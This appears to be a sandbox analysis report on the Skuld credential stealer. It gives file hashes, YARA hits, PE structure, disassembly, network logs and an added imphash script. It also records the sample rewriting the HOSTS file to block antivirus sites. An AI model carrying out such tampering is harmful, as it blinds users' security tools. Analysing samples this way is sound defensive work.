                                                                                                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^........q}...#FM.X....}m..X...{[.%.-.^P.....A...,H....."...a.e..]v..3...3s.{..........3../..............@.2........d.c.......@v0........d.c.......@v0........d.c.......@v0........d.c.......@v0..Z.;n..}:m...............b..y.Qr..... .0...4h..7j....Q.hr....THW\\,...UN]....K............G.UW.|.a.?.......?O..w.-..w.....#.<"O>..t..SF..#.:v.&W^e..v/*.3.wUA]{..!:.<..S.........`.b.9.n]y...A..^.{..O...7..Ra`.^.e.|...\u...{d.G.DF..AF.hf.V>.y...y.... c.. ...C...Q..Wn...o.....n...S&..K.d...P..-...w.~..m.w&Iw...*.T...... ...).[....Ge...o?c...-..z..w.>26?_.t.&W_s......w..R...q.?e..H.w.J..x.......9...?<!%s.........X.+...O..... .._..,;..*;...;.6.]K.].[J...d.w&...P!.......Y.XL..G.-.>....>\...g..>.x.@...zJ...+.>. ....M.....T..ku_....p.....l..?.f.0Y.d..].l..Y6..B6~........S!...l..R^.......+..";.....o..oI...7.;.TW..........,c,&...G....u8g..bI4..R....L.0Iz..%.53......>"k
                                                                                                                                          Process:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10810368
                                                                                                                                          Entropy (8bit):6.302238189558208
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:eVAAxtu/EQrLafuvVfVOsdQnJpyMR/w9A0rn7vEPb:eTxw/E0fVOsiJpyMR/wGysPb
                                                                                                                                          MD5:1B19480E05B72ABB96AAFDF9625B5646
                                                                                                                                          SHA1:38A12185FCEDF55ECB219E684206A733FFF2CD7B
                                                                                                                                          SHA-256:40A684FF28F001AD2B3AAA501D2EADE9AAF94FE6951EEA52239F39835E6C7E37
                                                                                                                                          SHA-512:98B45AA93A0754F396E97AD44DD18D4E2A639F87731E1477445734C228FAF0254CB9A0CE57CA1F34F9F0A7619E9C565F5B62D93D45A1CD1204B2952B51EBBF9D
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................"......TO.........`|........@...........................................`... .................................................>..............X................%.................................................. y..x............................text...qSO......TO................. ..`.rdata....I..pO...I..ZO.............@..@.data....T...p.......N..............@....pdata..X..........................@..@.xdata.............................@..@.idata..>..........................@....reloc...%.......&.................@..B.symtab..............................B................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):2165
                                                                                                                                          Entropy (8bit):4.522303506272206
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:vDZhyoZWM9rU5fFcqwUYi1iBopn2g2+oGSVy2w23c4Zezwd0/a7S4qqBLE97aFsL:vDZEurK9UUlcBsn2g2+lSw2w23c4ZezT
                                                                                                                                          MD5:BD87D7EA7B5DBD74CC0B0E38477F6079
                                                                                                                                          SHA1:63C28862A5D0052F2425A8B45AC0F66572A02F33
                                                                                                                                          SHA-256:EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
                                                                                                                                          SHA-512:1DD93CD24870D9716980B38145A1DC23F8EFB5DB93DB9D5223C1D0984CD8E064C6C99B6833F7066392BA79D887AC37F0BA3D8D5CD657B56967D51A2836C52AF0
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com.0.0.0.0 avast.com.0.0.0.0 www.avast.com.0.0.0.0 totalav.com.0.0.0.0 www.totalav.com.0.0.0.0 scanguard.com.0.0.0.0 www.scanguar
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with very long lines (381), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):392
                                                                                                                                          Entropy (8bit):5.237198052265355
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:0k4+DgBWg/sK2vAPKZC92/4jJpBVd+min79eEno:0k4+tgsZS2kX+TxXo
                                                                                                                                          MD5:7F599F4277A8C4152074D773FD3AB801
                                                                                                                                          SHA1:D19F04FD5E944642D6C5D684EBAB2F42C1177197
                                                                                                                                          SHA-256:A3639AF5E23464FC391DAE127FD5493F02C8178068A35866D9C7FDD35DCD623F
                                                                                                                                          SHA-512:CCE2C7C5240EA0D59C9C01C3AB3E3D7B4E0B026D5385B330D5B60D45B01D4D9CF5662B22F445154EE7368DF09D0D6C863D7019D20CDDFBC6E7C533774B46707B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:#< CLIXML..<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
                                                                                                                                          File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Entropy (8bit):6.302238189558208
                                                                                                                                          TrID:
                                                                                                                                          • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:skuld.exe
                                                                                                                                          File size:10'810'368 bytes
                                                                                                                                          MD5:1b19480e05b72abb96aafdf9625b5646
                                                                                                                                          SHA1:38a12185fcedf55ecb219e684206a733fff2cd7b
                                                                                                                                          SHA256:40a684ff28f001ad2b3aaa501d2eade9aaf94fe6951eea52239f39835e6c7e37
                                                                                                                                          SHA512:98b45aa93a0754f396e97ad44dd18d4e2a639f87731e1477445734c228faf0254cb9a0ce57ca1f34f9f0a7619e9c565f5b62d93d45a1cd1204b2952b51ebbf9d
                                                                                                                                          SSDEEP:98304:eVAAxtu/EQrLafuvVfVOsdQnJpyMR/w9A0rn7vEPb:eTxw/E0fVOsiJpyMR/wGysPb
                                                                                                                                          TLSH:FBB65A47E8A145E5C0AD9275C6268267BF713C885F3063D36B60F7282F77BD0AAB9740
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......TO.........`|........@...........................................`... ............................
                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                          Entrypoint:0x477c60
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows cui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:6
                                                                                                                                          OS Version Minor:1
                                                                                                                                          File Version Major:6
                                                                                                                                          File Version Minor:1
                                                                                                                                          Subsystem Version Major:6
                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                          Import Hash:d42595b695fc008ef2c56aabd8efd68e
Instruction (entry point, decoded as x86-64)
The image is a 64-bit PE (HIGH_ENTROPY_VA, .pdata/.xdata unwind data, RtlVirtualUnwind/RtlLookupFunctionEntry imports), so the listing is read in 64-bit mode: the REX prefix bytes 0x40-0x4F, which a 32-bit decoder prints as spurious inc/dec instructions, are folded into the 64-bit operands below. The RIP-relative displacement of the first memory load is shown as the raw 32-bit value.
jmp 00007F9724C4D000h
int3 (repeated 27 times; alignment padding between functions)
push rbp
mov rbp, rsp
pushfq
cld
sub rsp, 000000E0h
mov qword ptr [rsp], rdi
mov qword ptr [rsp+08h], rsi
mov qword ptr [rsp+10h], rbp
mov qword ptr [rsp+18h], rbx
mov qword ptr [rsp+20h], r12
mov qword ptr [rsp+28h], r13
mov qword ptr [rsp+30h], r14
mov qword ptr [rsp+38h], r15
movups dqword ptr [rsp+40h], xmm6
movups dqword ptr [rsp+50h], xmm7
movups dqword ptr [rsp+60h], xmm8
movups dqword ptr [rsp+70h], xmm9
movups dqword ptr [rsp+00000080h], xmm10
movups dqword ptr [rsp+00000090h], xmm11
movups dqword ptr [rsp+000000A0h], xmm12
movups dqword ptr [rsp+000000B0h], xmm13
movups dqword ptr [rsp+000000C0h], xmm14
movups dqword ptr [rsp+000000D0h], xmm15
xorps xmm15, xmm15
xor r14, r14
mov rax, qword ptr [rip+009F2E02h]
mov rax, qword ptr [rax]
cmp rax, 00000000h
je 00007F9724C50965h
mov r14, qword ptr [rax]
sub rsp, 10h
mov rax, rcx
mov rbx, rdx
call 00007F9724C5AE9Bh
The entry point is a single jump; the function that follows the padding saves every Win64 callee-saved register (rbx, rbp, rsi, rdi, r12-r15, xmm6-xmm15) and then zeroes xmm15 and r14, which is how the Go runtime establishes its internal ABI (xmm15 as the zero register, r14 as the goroutine pointer) when entered from foreign Windows code. Together with the zero link timestamp, the .symtab section and a kernel32.dll-only import table, this is consistent with the Go-linked binary that the detection names.
Name                                 Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT         0xa9b000         0x53e         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION      0xa7d000         0x1c758       .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY       0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC      0xa9c000         0x125e4       .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS            0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT            0x997920         0x178         .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED       0x0              0x0
Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type           Entropy               Characteristics
.text    0x1000           0x4f5371      0x4f5400  e13aadca07fd714c7b6ee444ba1eceaf  unknown   unknown              unknown             unknown               IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata   0x4f7000         0x49f2c8      0x49f400  30164080b19d6a015b4b95a0983a04d1  unknown   unknown              unknown             unknown               IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data    0x997000         0xe54d0       0x8ae00   dc378de327ab90c6ea049381a1cab2e0  False     0.44049737004950495  data                5.474001955888405     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata   0xa7d000         0x1c758       0x1c800   60fc52114c3960b32acfb403a84d79cb  False     0.40284916392543857  data                5.578985131266137     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata   0xa9a000         0xb4          0x200     e081e1b68888a642916dfe290e66cc84  False     0.2265625            shared library      1.783206012798912     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata   0xa9b000         0x53e         0x600     47964ba415ecbe03922c7ab31e9305bd  False     0.3763020833333333   OpenPGP Public Key  4.014135709345301     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc   0xa9c000         0x125e4       0x12600   38071608851efceb90573fb3cee85738  False     0.20777529761904762  data                5.437444673783102     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab  0xaaf000         0x4           0x200     07b5472d347d42780469fb2654b7fc54  False     0.02734375           data                0.020393135236084953  IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL           Import
kernel32.dll  WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler
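The Import Hash above is derived from exactly this import table. The following script is an added illustration, not code from the sandbox or from the sample: it recomputes an imphash using the pefile convention (lower-cased "library.function" pairs in import-table order, with a .dll/.ocx/.sys extension stripped from the library name, joined by commas and hashed with MD5) over the kernel32.dll list as the report prints it. The function names (imphash, imphash_string, normalize_library) and the constant names are this example's own, and the ordinal handling is simplified: pefile additionally maps known ordinals of ws2_32.dll and oleaut32.dll to names, which is omitted here. The practical caveat for this sample is that Go's linker emits the same kernel32.dll import table for every program built with a given toolchain version, so the resulting hash is shared by many unrelated Go binaries and is a weak pivot on its own; comparing the canonical string, rather than the digest, shows why two samples collide.

```python
"""Recompute a PE import hash (imphash) the way the "Import Hash" field of a
sandbox report is derived.

Added illustration (not the sandbox's or the sample's code). It follows the
widely used pefile convention: for every imported function, emit
"<library>.<function>" in import-table order, lower-cased, with a .dll/.ocx/.sys
extension stripped from the library name; join with commas and MD5 the result.
Name-less imports are rendered as "ordN" (assumption: pefile additionally maps
known ordinals of ws2_32.dll and oleaut32.dll to names, which is omitted here).
"""
import hashlib
from typing import Sequence, Tuple, Union

ImportName = Union[str, int]          # function name, or ordinal for name-less imports
ImportTable = Sequence[Tuple[str, Sequence[ImportName]]]

# kernel32.dll entries in the order the report lists them (constructed from the table above).
KERNEL32_IMPORTS = [
    "WriteFile", "WriteConsoleW", "WerSetFlags", "WerGetFlags",
    "WaitForMultipleObjects", "WaitForSingleObject", "VirtualQuery", "VirtualFree",
    "VirtualAlloc", "TlsAlloc", "SwitchToThread", "SuspendThread",
    "SetWaitableTimer", "SetProcessPriorityBoost", "SetEvent", "SetErrorMode",
    "SetConsoleCtrlHandler", "RtlVirtualUnwind", "RtlLookupFunctionEntry", "ResumeThread",
    "RaiseFailFastException", "PostQueuedCompletionStatus", "LoadLibraryW", "LoadLibraryExW",
    "SetThreadContext", "GetThreadContext", "GetSystemInfo", "GetSystemDirectoryA",
    "GetStdHandle", "GetQueuedCompletionStatusEx", "GetProcessAffinityMask", "GetProcAddress",
    "GetErrorMode", "GetEnvironmentStringsW", "GetCurrentThreadId", "GetConsoleMode",
    "FreeEnvironmentStringsW", "ExitProcess", "DuplicateHandle", "CreateWaitableTimerExW",
    "CreateThread", "CreateIoCompletionPort", "CreateEventA", "CloseHandle",
    "AddVectoredExceptionHandler", "AddVectoredContinueHandler",
]
REPORT_IMPORTS: ImportTable = [("kernel32.dll", KERNEL32_IMPORTS)]

_STRIPPED_EXTENSIONS = {"dll", "ocx", "sys"}


def normalize_library(dll_name: str) -> str:
    """Lower-case the library name and drop a .dll/.ocx/.sys extension (others are kept)."""
    name = dll_name.lower()
    stem, dot, ext = name.rpartition(".")
    return stem if dot and ext in _STRIPPED_EXTENSIONS else name


def imphash_string(imports: ImportTable) -> str:
    """The canonical string that gets hashed; diffing it between two binaries explains a collision."""
    parts = []
    for dll_name, functions in imports:
        lib = normalize_library(dll_name)
        for func in functions:
            name = f"ord{func}" if isinstance(func, int) else func.lower()
            parts.append(f"{lib}.{name}")
    return ",".join(parts)


def imphash(imports: ImportTable) -> str:
    """MD5 of the canonical string, as 32 lower-case hex digits (order-sensitive by design)."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print(imphash_string(REPORT_IMPORTS))
    print(imphash(REPORT_IMPORTS))
```

Run it and compare the printed digest with the report's Import Hash; a mismatch means either the sandbox uses a different convention or the list above is not the complete import table in on-disk order. Because the hash is order-sensitive, a binary with the same functions imported in a different order gets a different value, which is why the canonical string is the more useful artefact when explaining a match or a miss.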
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Mar 12, 2025 10:40:45.096761942 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:45.096807003 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:45.096949100 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:45.097508907 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:45.097521067 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:46.675412893 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:46.675640106 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:46.675649881 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:46.675744057 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:46.675749063 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:46.677251101 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:46.677319050 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:46.751630068 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:46.751796961 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:46.751863956 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:46.751869917 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:46.801635981 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:47.226687908 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:47.226757050 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:47.226819992 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:47.227008104 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:47.227019072 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:47.227036953 CET  49704        443        192.168.2.18     104.26.13.205
Mar 12, 2025 10:40:47.227041006 CET  443          49704      104.26.13.205    192.168.2.18
Mar 12, 2025 10:40:47.826724052 CET  49705        80         192.168.2.18     208.95.112.1
Mar 12, 2025 10:40:47.831422091 CET  80           49705      208.95.112.1     192.168.2.18
Mar 12, 2025 10:40:47.831512928 CET  49705        80         192.168.2.18     208.95.112.1
Mar 12, 2025 10:40:47.831756115 CET  49705        80         192.168.2.18     208.95.112.1
Mar 12, 2025 10:40:47.836404085 CET  80           49705      208.95.112.1     192.168.2.18
Mar 12, 2025 10:40:48.297143936 CET  80           49705      208.95.112.1     192.168.2.18
Mar 12, 2025 10:40:48.351603031 CET  49705        80         192.168.2.18     208.95.112.1
Mar 12, 2025 10:40:49.248801947 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:49.248852968 CET  443          49706      51.91.7.6        192.168.2.18
Mar 12, 2025 10:40:49.248925924 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:49.249399900 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:49.249413013 CET  443          49706      51.91.7.6        192.168.2.18
Mar 12, 2025 10:40:49.313220978 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:49.313327074 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:49.313402891 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:49.314567089 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:49.314599991 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:51.055202007 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:51.055655003 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:51.055655003 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:51.055690050 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:51.055712938 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:51.057068110 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:51.057178020 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:51.084177971 CET  443          49706      51.91.7.6        192.168.2.18
Mar 12, 2025 10:40:51.084471941 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:51.084492922 CET  443          49706      51.91.7.6        192.168.2.18
Mar 12, 2025 10:40:51.084705114 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:51.084712029 CET  443          49706      51.91.7.6        192.168.2.18
Mar 12, 2025 10:40:51.085767031 CET  443          49706      51.91.7.6        192.168.2.18
Mar 12, 2025 10:40:51.086009979 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:51.150815964 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:51.150823116 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:51.150944948 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:51.150959969 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:51.150993109 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:51.151026964 CET  443          49706      51.91.7.6        192.168.2.18
Mar 12, 2025 10:40:51.151283026 CET  443          49707      162.159.136.232  192.168.2.18
Mar 12, 2025 10:40:51.191432953 CET  49707        443        192.168.2.18     162.159.136.232
Mar 12, 2025 10:40:51.191443920 CET  49706        443        192.168.2.18     51.91.7.6
Mar 12, 2025 10:40:51.191462040 CET  443          49707      162.159.136.232  192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.191483974 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.239173889 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.239924908 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.748188972 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.748280048 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.748522997 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.748522997 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.749495983 CET49706443192.168.2.1851.91.7.6
                                                                                                                                          Mar 12, 2025 10:40:51.749516964 CET4434970651.91.7.6192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.809875965 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.809947014 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.811224937 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.811254978 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.823474884 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.823662996 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.824012995 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.824012995 CET49707443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:40:51.824031115 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:51.824040890 CET44349707162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:53.252554893 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:40:53.259449959 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:53.358484983 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:53.403986931 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:23.363704920 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:23.368418932 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:23.778182983 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:23.778228045 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:23.778315067 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:23.778594971 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:23.778613091 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.427510977 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.427841902 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.427869081 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.428066969 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.428073883 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.429327965 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.429430008 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472434044 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472640038 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472642899 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472680092 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472754002 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472758055 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472769976 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472925901 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472925901 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472958088 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.472971916 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.472990990 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473032951 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473058939 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.473062038 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473097086 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473119020 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.473212957 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:25.473227024 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:25.473259926 CET49755443192.168.2.18162.159.136.232
